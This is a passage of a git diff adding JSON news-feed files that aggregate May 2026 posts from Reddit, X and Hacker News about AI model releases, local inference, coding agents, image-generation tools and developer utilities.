that we’ve seen before. The following is from their Hugging Face: https://huggingface.co/sensenova/SenseNova-U1-8B-MoT ——— Overview SenseNova U1 is a new series of native multimodal models that unifies multimodal understanding, reasoning, and generation within a monolithic architecture. It marks a fundamental paradigm shift in multimodal AI: from modality integration to true unification. Rather than relying on adapters to translate between modalities, SenseNova U1 models think-and-act across language and vision natively. 
The unification of visual understanding and generation opens tremendous possibilities. SenseNova U1 sits in the stage of Data-driven Learning (like ChatGPT), yet gestures toward the next stage, that is, Agentic Learning (like Ope…", + "category": "ai_models" + }, + { + "title": "Local Dream 2.4.3 - SDXL support, tag autocomplete and more", + "url": "https://reddit.com/r/StableDiffusion/comments/1t4d7ix/local_dream_243_sdxl_support_tag_autocomplete_and/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T11:53:55.000Z", + "summary": "Local Dream 2.4 was released two weeks ago and has since received three more updates. The main new features: \\- SDXL/Illustrious/PonyXL support for Snapdragon 8 Gen 3 and newer (Elite) chips, based on NPU \\- Tag autocomplete from CSV import \\- Token counter for prompts \\- LCM scheduler and many more fixes have been added. It’s worth checking out the release notes for version 2.4! [https://github.com/xororz/local-dream/releases](https://github.com/xororz/local-dream/releases)", + "category": "creative_tools" + }, + { + "title": "Building a 9-ball AI player: Candidate generation for direct cut shots [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t3xplr/building_a_9ball_ai_player_candidate_generation/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-04T23:00:30.000Z", + "summary": "I'm building a 9-ball-player to help with pattern play. There are many ways to make the next ball, and sometimes in more than one obvious pocket. Which should should you choose depends on probability of making that shot AND ending up in a favorable spot for the next shot, that is also amenable to getting good position for the shot after. 
To that end, I have built the following components: * A transformer based model that learns p(win) given a table layout. * Candidate shot generator that includes cut shots, bank shots, kick shots, caroms and combination shots as well as safeties. * An evaluator that will pick the best shots based on the p(win) model on the resulting state of each candidate shot. The ground truth: **pooltool** Pool physics is well-modeled but expensive. I use pooltool python library, a solid open-source billiards simulator with accurate ball-cushion-pocket-felt interactions. A single shot takes \\~5–15 ms to simulate end-to-end on one CPU thread for the typical 1–3 object-ball layouts that come up in shot evaluation; full racks (9 object balls) push that to \\~20–50 ms because there are more pairwise collisions to track. Sounds fast until you do the math. For each la…", + "category": "ai_research" + }, + { + "title": "Parax v0.5: Parametric Modeling in JAX [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t3jmdc/parax_v05_parametric_modeling_in_jax_p/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-04T14:38:31.000Z", + "summary": "Hi everyone! Just sharing an update on my project [Parax](https://github.com/gvcallen/parax), which caters for \"parametric modeling\" in JAX. Previously, Parax was more focused on scientific applications, however I've since generalized it to be a tool useful for any type of JAX work. It now has a strong focus on a clean, extandable API, as well as ensuring the library is entirely **opt-in,** as opposed to its previous versions which took a more framework-like approach. 
Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters * Filtering and manipulation tools The documentation is available [here](https://gvcallen.github.io/parax/) along with some basic examples. Perhaps the package is of use to someone out there! Cheers, Gary", + "category": "ai_research" + }, + { + "title": "AutoBe benchmark: structured harness narrows frontier-vs-local gap in backend generation [D]", + "url": "https://reddit.com/r/MachineLearning/comments/1t3hks9/autobe_benchmark_structured_harness_narrows/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-04T13:21:59.000Z", + "summary": "AutoBe is a benchmark for end-to-end backend generation. One natural language request produces six outputs: requirements analysis, ERD, OpenAPI spec, E2E tests, NestJS implementation, and a type-safe SDK. Each phase fills a predefined AST via structured function calling rather than generating unstructured code. The scoring rubric is 100 points driven entirely by static analysis - the same artifact scores the same regardless of who reruns it. The headline finding is that scores cluster tightly. GLM 5 tops the benchmark run. qwen3.5-27b sits directly behind frontier models. Several local models produced enterprise-scale backends with 100% compile success. The author's interpretation: once the harness is structured, backend-generation quality is constrained more by harness design than by model prestige. The cost contrast is significant. A full benchmark run at frontier pricing ($5/M input tokens) runs $1,000-$1,500 per model. 
The next benchmark round plans to filter to models at $0.25/M input or runnable on a 64GB unified-memory laptop - which would include most of the models that clustered near the top anyway. The honest caveat from the author: this uses four reference projects and…", + "category": "ai_research" + }, + { + "title": "\"FLUX Creator Program\" - New Flux models sooner than expected?", + "url": "https://reddit.com/r/StableDiffusion/comments/1t4vlo7/flux_creator_program_new_flux_models_sooner_than/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-05T23:10:28.000Z", + "summary": "are we getting new Flux models soon? hopefully open source. Would love a new klein model [link](https://x.com/bfl_ml/status/2051723708046233688) to post", + "category": "creative_tools" + }, + { + "title": "Best Open Source models for running on Gaming PC or Mac mini M4", + "url": "https://reddit.com/r/StableDiffusion/comments/1t4p2mn/best_open_source_models_for_running_on_gaming_pc/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-05T19:04:40.000Z", + "summary": "I have a gaming PC with a Nvidia 5070 12gb VRAM 32gb RAM and a ryzen 9 7800x 12 core I also have a Mac mini m4 * Chip (Processor): Apple M4 chip with 10-core CPU, 10-core GPU, 16-core Neural Engine * Memory: 32GB unified memory * Storage: 512GB SSD storage Wanted to get opinions on best open source models for agentic and generative purposes on these machines Thank you!", + "category": "creative_tools" + }, + { + "title": "OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. 
The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integrati…", + "url": "https://x.com/H_Mhatre_/status/2051715305890521578", + "source": "X / @h_mhatre_", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T17:27:02.000Z", + "summary": "OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integration. $MSFT", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-06.json b/data/news-feed-2026-05-06.json new file mode 100644 index 0000000..d8493de --- /dev/null +++ b/data/news-feed-2026-05-06.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:38.082Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-06", + "article_count": 15, + "archived_story_count": 542, + "articles": [ + { + "title": "[WIP] ComfyUI Powered Klein 2 KV Edit i2i plugin (Chromium)", + "url": "https://reddit.com/r/StableDiffusion/comments/1t5rofv/wip_comfyui_powered_klein_2_kv_edit_i2i_plugin/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-06T22:12:19.000Z", + "summary": "This is something I am working on based upon an earlier WIP item that was using ZiT for something similar. However with Klein KV a lot of power to manipulate is in the prompts. So I am currently testing/building an i2i web browser plugin that allows custom prompt creating and saving and can be expanded and sorted by tabs. I'm going to post this link as a demo and/or bones for other to also take and run with as well. 
I do plan on updating some things here myself in my upcoming free time, but for some people this might be just what may work for them. At the end of the day it's all just html/js/css and we all have LLM's and enjoy open source. This can also be converted to a firefox plugin if you wish as well. Feel free to take it and do whatever else you may want to and consider this the starter template for it. [https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2\\_KVEdit\\_i2i%20-%20Chromium%20Sidebar-Demo.zip](https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2_KVEdit_i2i%20-%20Chromium%20Sidebar-Demo.zip) If you never interacted with ComfyUI outside of it, you will need to enable API mode in the settings. You will al…", + "category": "creative_tools" + }, + { + "title": "OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI", + "url": "https://x.com/Reeperr131/status/2052074977973694608", + "source": "X search / Agent workflows", + "tags": [ + "api_update", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-06T17:16:15.000Z", + "summary": "OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI", + "category": "ai_agents" + }, + { + "title": "CopilotKit (MIT) - Open-Source Building Blocks for Agent Apps and Generative UI", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t5gus6/copilotkit_mit_opensource_building_blocks_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-06T15:50:28.000Z", + "summary": "Even with 
agent framework DX getting somewhat better - it's still really annoying to build real apps with them. Even a basic in-app agent chatbot already drags in streaming, tool call rendering, and state sync. Vercel's AI SDK makes it much easier to start, but it pulls you right into Vercel's whole stack and is too opinionated on the agent framework side. This is what is great about CopilotKit (30k stars, MIT). They provide React building blocks for the agent UI layer: chat, streaming, tool calls, HITL, generative UI. The piece that makes it horizontal is AG-UI, an open protocol it speaks on the backend, with shipped support in LangGraph, ADK, Strands, CrewAI, Mastra, Pydantic AI, LlamaIndex, Agno, and others. Same UI, any agent framework, no per-framework adapter. Bring your own everything: agent, model, backend, hosting. It's really powerful. I discovered CopilotKit after being involved with the community on open source AG-UI which they're very involved with. Have had a great experience building with it! Not sure why people aren't talking about it more. Repo: [https://github.com/CopilotKit/CopilotKit](https://github.com/CopilotKit/CopilotKit)", + "category": "ai_models" + }, + { + "title": "2.5x faster inference with Qwen 3.6 27B using MTP - Finally a viable option for local agentic coding - 262k context on 48GB - Fixed chat template - Drop-in OpenAI and Anthropic API endpoints", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t57xuu/25x_faster_inference_with_qwen_36_27b_using_mtp/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-06T09:35:42.000Z", + "summary": "> **WARNING: wait before download from HF: I just realised my upload of the new versions with the additional fix in the chat template has not completed yet. 
I will remove this warning once done** The recent PR to llama.cpp bring MTP support to Qwen 3.6 27B. This uses the built-in tensor layers for speculative decoding. None of the existing GGUF have it, as they need to be converted with this PR. I have tested it locally on my mac M2 Max 96GB, and the results are amazing: 2.5x speed increase, bringing it to 28 tok/s! In addition the recent releases of llama.cpp also support turboquants, which helps a lot with memory usage in more constrained environment (including an additional speed boost). I have converted the most useful quants and uploaded them to HF. Even if you are using apple silicon, you should use those instead of MLX. You can download them here: [https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF](https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF) This also includes 7 fixes I made to the original jinja chat template, due to vLLM specificity which broke in other tools: https://huggingface.co/froggeric/Qwen-Fixed-Chat-Templates For now, you will need to compile yo…", + "category": "ai_models" + }, + { + "title": "Getting error \"command 'claude-vscode.editor.openLast' not found\", but not like anyone has talked about.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t51ayl/getting_error_command_claudevscodeeditoropenlast/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-06T03:26:08.000Z", + "summary": "I've read many posts and github pages about this exact issue, but mine is different. Its not jsut that error. Any anthropic claude code command from logout to open in sidebar resutls in the error \"Command 'Claude Code: <command>' resulted in an error. command 'claude-vscode.sidebar.<command>' not found\". I have tried to diagnose and fix the issue and its not working. Here is what is not working: 1. Claude sidebar not working 2. 
No claude commands from command pallete working 3. Claude extension icon not showing up on far left side and not in the dropdown for extensions to show Here is the error from Developer: Show Logs.. with choosing Extension Host: `2026-05-05 21:57:07.411 [error] Activating extension Anthropic.claude-code failed due to an error:` `2026-05-05 21:57:07.412 [error] TypeError: The argument 'filename' must be a file URL object, file URL string, or absolute path string. Received 'file:///home/runner/work/claude-cli-internal/claude-cli-internal/build-agent-sdk/sdk.mjs'` `at Module.createRequire (node:internal/modules/cjs/loader:1922:13)` `at Object.<anonymous> (c:\\Users\\___\\.vscode\\extensions\\anthropic.claude-code-2.1.129-win32-x64\\extension.js:102:…", + "category": "ai_tools" + }, + { + "title": "UniReasoner: Using LLMs as \"Universal Reasoners\" to Fix Prompt Alignment", + "url": "https://reddit.com/r/StableDiffusion/comments/1t5p67x/unireasoner_using_llms_as_universal_reasoners_to/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-06T20:39:46.000Z", + "summary": "A new paper titled Large Language Models are Universal Reasoners for Visual Generation introduces UniReasoner, a framework designed to close the \"understanding-generation gap\" in text-to-image models. The core observation is that while unified multimodal models often fail to follow complex prompts during generation (e.g., getting counts or spatial relations wrong), the exact same model is usually excellent at verifying those mistakes when looking at the resulting image. Current models like BAGEL might generate five apples when asked for four. However, if you ask that same model to count the apples in its own generated image, it correctly identifies there are five. 
This suggests that the model's \"understanding\" capacity is much stronger than its \"generative\" capacity. UniReasoner converts this verification strength into direct guidance for the diffusion process using a three-stage pipeline: 1. The LLM generates a coarse visual draft using discrete vision tokens. This acts as a spatial and semantic plan for the scene. 2. The same LLM evaluates its draft against the original prompt. It produces a \"grounded evaluation\" in text, pinpointing exactly what is wrong (e.g., \"Missing a bicyc…", + "category": "creative_tools" + }, + { + "title": "Followup to the kanban for Claude Code - now vibeyard's home screen is a yard I build myself", + "url": "https://reddit.com/r/ClaudeAI/comments/1t5og8l/followup_to_the_kanban_for_claude_code_now/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-06T20:13:39.000Z", + "summary": "Even with the kanban, I still opened 3 tabs every morning - PRs in GitHub, tasks on the board, half-finished sessions in the terminal - just to figure out what to work on. So I made the home screen of **Vibeyard** (open-source, MIT) a yard you build yourself. Drop in widgets - open PRs, issues, AI readiness, active sessions, kanban, team - arrange them however you want. **Click any card → it spawns a Claude session scoped to it. A PR opens a review session. An issue opens a plan-the-fix session. 
A stale session resumes where you left off.** (Followup to my last post: https://www.reddit.com/r/ClaudeAI/comments/1sye8bs/) GitHub: [https://github.com/elirantutia/vibeyard](https://github.com/elirantutia/vibeyard) **Contributions and feedbacks are welcome!**", + "category": "ai_tools" + }, + { + "title": "Internal tools wIth no MCP", + "url": "https://reddit.com/r/ClaudeAI/comments/1t5ah5r/internal_tools_with_no_mcp/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-06T11:46:48.000Z", + "summary": "We have several internal systems that all have robust APIs. Some are internet facing and some are not. None of them have MCP servers available for them. Im trying to figure out what and how the best way is to connect Claude Enterprise to these systems via API to pull the data we need from them with MCP.", + "category": "ai_tools" + }, + { + "title": "Show HN: Adam – An embeddable cross-platform AI agent library", + "url": "https://github.com/sqliteai/adam", + "source": "Hacker News", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 0.96, + "date": "2026-05-06T12:56:29.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "The GB10 Solution Atlas is now open source, the inference engine made for the community with breakneck inference speeds (Qwen3.6-35B-FP8 100+ tok/s)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t5p2yv/the_gb10_solution_atlas_is_now_open_source_the/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-06T20:36:19.000Z", + "summary": "Some of you saw our post a couple weeks back about hitting 102 tok/s stable on Qwen3.5-35B on a DGX Spark. 
A lot of you asked \"cool, where's the code?\" Today's the day: [Github](https://github.com/Avarok-Cybersecurity/atlas) **Atlas is open source.** Pure Rust + CUDA, no PyTorch, no Python runtime, \\~2.5 GB image, <2 minute cold start. We rewrote the whole stack from HTTP handler to kernel dispatch because the bottleneck on Spark wasn't the silicon, it was 20+ GB of generic Python machinery sitting between your prompt and the GPU. We need community support to keep elevating Atlas **for developers**. **Numbers on a single DGX Spark (GB10):** Qwen3.5-35B (NVFP4, MTP K=2): 130 tok/s peak, \\~111 tok/s sustained → 3.0–3.3x vLLM at testing time Qwen3.5-122B (NVFP4, EP=2): \\~50 tok/s decode Qwen3-Next-80B-A3B (NVFP4, MTP): \\~87 tok/s Nemotron-3 Nano 30B (FP8): \\~88 tok/s Full model matrix on the site (Minimax2.7, Qwen3.6, Gemma too!) **What's actually different:** Hand-tuned CUDA kernels for Blackwell SM120/121 meaning attention, MoE, GDN, Mamba-2. No generic fallbacks. Native NVFP4 + FP8 on tensor cores MTP (Multi-Token Prediction) speculative decoding for up to 3x throughput on deco…", + "category": "ai_models" + }, + { + "title": "Anyone else tried this RefineAnything LoRA? Pretty impressed so far", + "url": "https://reddit.com/r/StableDiffusion/comments/1t5n9nz/anyone_else_tried_this_refineanything_lora_pretty/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-06T19:32:13.000Z", + "summary": "Been messing around with the RefineAnything project for the past few days and honestly the results are kinda wild for local detail fixes. Figured I'd share in case anyone else is into this stuff. Quick rundown of what it does: you give it an image + a region (scribble mask or bounding box), and it cleans up just that area — text, logos, product labels, thin lines, that kind of thing. The rest of the image stays untouched. Works with or without a reference image too. 
Original project: [https://github.com/limuloo/RefineAnything](https://github.com/limuloo/RefineAnything) While I was testing it I got tired of doing the mask prep, reference alignment, and paste-back manually every time, so I built a little ComfyUI plugin to handle all that. Just wanted to be clear though — **the plugin isn't tied to this specific LoRA at all**. It's totally model-agnostic, so it should work fine for pretty much any local detail repair workflow you're already running. RefineAnything just happens to be what I tested it with, and my test workflow is included in the plugin repo if you want to try it. Plugin: [https://github.com/1Kynx/ComfyUI-RefineNode](https://github.com/1Kynx/ComfyUI-RefineNode) Where I…", + "category": "creative_tools" + }, + { + "title": "I analyzed 922 agentic task trace and found the secret weapon of DeepSeek v4", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t5lywi/i_analyzed_922_agentic_task_trace_and_found_the/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-06T18:46:20.000Z", + "summary": "I recently did a benchmark of deepseek v4 in agentic tasks. Performance-wise, it's one of the best open source models, as expected. What really surprised me is the cost. I mean I know it's cheap, but it's cheap in a way that doesn't really make sense. # Cost Estimation Let's take v4 flash as example since it's not on sale (so it can better reflect the actual provider cost). [deepseek v4 flash price on openrouter](https://preview.redd.it/vh4qfgn6zjzg1.png?width=562&format=png&auto=webp&s=8df0fae84b5b5840efdc87e50ef2db6a5fc23134) [opus 4.7 price on openrouter](https://preview.redd.it/c7qumr2u0kzg1.png?width=533&format=png&auto=webp&s=31101fb42a75d2ba33169c570c61e4297c28901b) Looking at OpenRouter price, deepseek v4 flash price is about 0.03x opus 4.7 price. 
(We only look at input token price because in long agentic task, input token is the dominant cost.) So if v4 flash uses similar amount of token in a task as opus 4.7, the actual cost should be somewhere around 0.03x compared to using opus. # Actual Data Then I ran the benchmark, long agentic tasks running in openclaw (which uses PI for agent loop), openrouter as model provider. The actual cost data blew my…", + "category": "ai_models" + }, + { + "title": "the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not \"ai productivity copilot for everyone.\" one pai…", + "url": "https://x.com/NovaByArun/status/2052077319960047791", + "source": "X search / AI vibes", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-06T17:25:33.000Z", + "summary": "the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not \"ai productivity copilot for everyone.\" one painful workflow. one credible audience.", + "category": "ai_tools" + }, + { + "title": "Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha", + "url": "https://x.com/AzaleasWatkin/status/2052075760354238868", + "source": "X search / Agent workflows", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-05-06T17:19:21.000Z", + "summary": "Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha", + "category": "ai_agents" + }, + { + "title": "I can't keep with Claude releases anymore.. 
how many AI agents are actually shipping all these e2e features at Anthropic?", + "url": "https://x.com/MichaelAzmy/status/2052075579424334002", + "source": "X search / AI model updates", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-06T17:18:38.000Z", + "summary": "I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic?", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-07.json b/data/news-feed-2026-05-07.json new file mode 100644 index 0000000..1af29d9 --- /dev/null +++ b/data/news-feed-2026-05-07.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:38.227Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-07", + "article_count": 15, + "archived_story_count": 548, + "articles": [ + { + "title": "I embedded an AI agent in my shell. It can now run interactive programs.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t6nuhz/i_embedded_an_ai_agent_in_my_shell_it_can_now_run/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source", + "developer_tool", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "open_source", + "developer_tool", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-07T21:18:26.000Z", + "summary": "I want to share a fun side project of mine over the past month or so where I tried to build a shell with an AI agent embedded. The embedded agent knows everything happening in the shell so I don't have to keep copy-and-pasting error messages to another coding agent while working in a terminal. Now it has grown into a useful tool in my daily workflow and a fun playground for agent experiments. 
Here I'm showing a new extension I'm building that launches an agent on a floating overlay that can read my terminal and type out commands for me, which I thought was really cool. I can already see lots of application of this idea such as helping me with interactive installation or helping me over an ssh session without remote installation. The project is fully [open source](https://github.com/guanyilun/agent-sh) with mit license, feel free to try it out and build on it. It should support local models as well as cloud models. This overlay feature is an experimental extension that only exists in the example folder. You can point your coding agent to the docs to help you set it up should you want to try it out (be sure to grab both the overlay-agent extension for the floating display and the te…", + "category": "ai_models" + }, + { + "title": "I just tried Reactor's open source world model demo, here are my thoughts", + "url": "https://reddit.com/r/StableDiffusion/comments/1t6qfff/i_just_tried_reactors_open_source_world_model/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-07T23:02:18.000Z", + "summary": "So I recently stumbled upon Reactor's new demo of an open source world model. AFAIK they are not training the models themselves, but they are the infra that powers them and will be offering them via SDK, which will be super interesting to see once this is available via API since so far they've been just text-to-video demos. 
Having tried it extensively, some of my thoughts: * The models are getting very good very fast * This can massively impact industries such as robotics * I am impressed at the visual fidelity of the model * We are still a few years away from anything gaming-related Would love to hear what you all think!", + "category": "creative_tools" + }, + { + "title": "My Claude dreams at night and remembers everything. Better than mempalace.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t5yhio/my_claude_dreams_at_night_and_remembers/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "tool_update" + ], + "matching_tags": [ + "mcp", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-07T03:08:34.000Z", + "summary": "Back in January I got tired of the same thing everyone complains about now you start a new session with Claude and it has no idea who you are. Every time. From scratch. So I built iai-mcp. A local daemon that captures every conversation, organizes it into three memory tiers, and feeds the right context back when you start a new session. No \"remember this.\" No copy-pasting from old chats. It just knows. I've been using it daily with Claude Code since January. Five months. At this point it knows my coding style, my project structures, my preferences things I never explicitly told it to save. It picked them up from conversation and held onto them. It stores everything verbatim, runs neural embeddings locally, encrypts at rest with AES-256, consolidates memory in the background while your machine is idle, and ships every benchmark harness so you can verify the numbers yourself. Verbatim recall above 99%. Retrieval under 100ms. Session-start cost under 3,000 tokens. I didn't release it because I was building it for myself. It worked, so I kept using it. But watching the space blow up made me realize maybe other people want this too. So here it is. Open source. MIT licensed. 
Five months…", + "category": "ai_tools" + }, + { + "title": "Claude Code: the only CLI where scrolling up is a premium feature", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6fwhx/claude_code_the_only_cli_where_scrolling_up_is_a/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-07T16:38:48.000Z", + "summary": "Love Claude Code. Genuinely. It's changed how I work. But can we talk about how in 2026, a $200/month AI coding tool can't do what echo \"hello world\" has done since 1971? If Claude writes more than one screenful of text — which it does approximately always — you scroll up and get... nothing. A beautiful void. Your conversation is gone. It existed briefly, like a Snapchat from your AI pair programmer. This has been reported across at least half a dozen GitHub issues going back months. The \"workarounds\": \\- Ctrl+O transcript mode — congrats, you can now read your conversation history, but Claude is frozen while you do. It's like being told \"you can look at your notes, but only if you stop the meeting.\" \\- iTerm2's \"Save lines to scrollback\" setting — tried it. Same blank screen. Maybe my iTerm is also frustrated. \\- Open in editor with v — so the workflow is: ask Claude a question, read the first half on screen, press Ctrl+O, press v, open vim, scroll to where you were, read the rest, quit vim, go back to Claude. Productivity! The root cause is apparently the alternate screen buffer from the Ink framework. I get it, architectural decisions are hard. 
But this is the equivalent of shi…", + "category": "ai_tools" + }, + { + "title": "why llama.cpp can’t combine speculative decode methods?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t63snn/why_llamacpp_cant_combine_speculative_decode/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-07T07:53:13.000Z", + "summary": "dicking around with the new mtp speculative decode with qwen3.6 27b, and it’s great. but for agentic coding i’ve seen significant improvements from ngram, because a decent fraction of the time (e.g. calling edit tool) the model is just repeating verbatim a section of code that it has already seen before. ngram can speculate on a lot of tokens reeaallly fast in comparison. it’d be great if we could combine them by using them both at the same time, but it looks like if i add them both to the command line arguments, only ngram is active. is there any reason both can’t be used simultaneously? fundamental limitation, or just an implementation limit with a fix on the horizon? EDIT: just looked at the PR again and PmNz8 asked the same question like two hours before i posted this. go give it an updoot! [https://github.com/ggml-org/llama.cpp/pull/22673#issuecomment-4394544777](https://github.com/ggml-org/llama.cpp/pull/22673)", + "category": "ai_models" + }, + { + "title": "ClaudePlaysPokemon Opus 4.7 run ongoing!", + "url": "https://reddit.com/r/ClaudeAI/comments/1t5y6gc/claudeplayspokemon_opus_47_run_ongoing/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-07T02:54:10.000Z", + "summary": "Currently streaming at: [https://www.twitch.tv/claudeplayspokemon](https://www.twitch.tv/claudeplayspokemon) This is a passion project by David Hershey, an Anthropic employee on the Applied AI team. 
He started it in June 2024 to learn agent development, posted updates to an internal Slack, coworkers got hooked, went public when Sonnet 3.7 launched in Feb 2025. Anthropic doesn't own it but promotes it and subsidizes the API costs since Claude is their model. Claude is playing Pokemon Red on a Game Boy emulator, the unmodified 1996 game (with a fan-made full color patch applied so the model can see the screen better). No human input, no walkthrough access, no game knowledge fed in. The system prompt actually tells Claude to distrust its own Pokemon knowledge since the game version may differ from what it knows. It gets a screenshot, a few tools, and md notes files. That's it. The current run is on Opus 4.7, the new flagship that came out three weeks ago. **5 of 8 badges at 15,779 steps**, party led by Ivy the Venusaur at Lv 62 with the rest of the team in the teens (classic overleveled-starter playthrough). For context, Opus 4.5 was at 48,000 steps and still stuck in Silph Co at the…", + "category": "ai_tools" + }, + { + "title": "Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business pr…", + "url": "https://x.com/xai/status/2052193877675983031", + "source": "X / @xai", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-07T01:08:43.000Z", + "summary": "Image 